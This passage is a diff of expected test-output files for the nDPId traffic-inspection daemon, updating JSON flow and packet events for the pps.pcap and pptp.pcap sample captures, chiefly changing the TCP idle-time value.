-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7560000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7560000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -545,12 +545,12 @@ 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7560000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -559,7 +559,7 @@ 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1467353136432,"flow_last_seen":1467353136981,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":148446,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"1.173.5.226","dst_ip":"192.168.115.8","src_port":22636,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} diff --git a/test/results/pptp.pcap.out b/test/results/pptp.pcap.out index 3f5b721f2..ebe581745 100644 --- a/test/results/pptp.pcap.out +++ b/test/results/pptp.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pptp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1451895531141} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1451895531141,"flow_last_seen":1451895531141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1451895531141,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} 